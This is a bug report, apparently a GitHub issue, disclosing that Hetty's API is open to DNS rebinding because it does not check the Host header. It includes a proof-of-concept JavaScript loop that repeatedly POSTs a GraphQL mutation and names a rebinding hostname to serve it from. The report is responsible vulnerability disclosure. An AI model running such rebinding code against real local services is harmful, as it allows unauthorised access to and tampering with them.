DNS rebinding attacks on Hetty's API #106
Description
Describe the bug
Hetty is vulnerable to DNS rebinding attacks because it does not validate the Host header.
A malicious remote server could exploit this to:
- trigger arbitrary HTTP requests to other hosts from the Hetty server (see could be used to attack services on the local network, localhost or internet);
- exfiltrate confidential data stored in Hetty.
Tested on 100.0a1 (2022-03-23).
I believe recent versions of Chrome are somehow protected against these type of attacks.
See as well https://www.gabriel.urdhr.fr/tags/dns-rebinding/ for more details in the context of other applications.
To Reproduce
function sleep(delay)
{
return new Promise((resolve, reject) => {
setTimeout(resolve, delay);
});
}
async function main()
{
while(true) {
try {
const response = await fetch("/api/graphql/", {
method: "POST",
headers: {
"Content-Type": "application/json",
},
body: `{"operationName":"CreateProject","variables":{"name":"ddd"},"query":"mutation CreateProject($name: String!) {\\n createProject(name: $name) {\\n id\\n name\\n __typename\\n }\\n}"}`
});
if (response.status == 200) {
alert("DONE!?")
return;
}
}
catch(e) {
}
await sleep(1000);
}
}
main();Served from a remote webserver such as:
http://a.192.0.2.1.1time.127.0.0.1.forever.9b173d68-dac5-4377-ba53-7a6473d130fe.rebind.network:8080/
Expected behavior
Request coming from another origin should be rejected.
Screenshots
Desktop (please complete the following information):
Smartphone (please complete the following information):
Additional context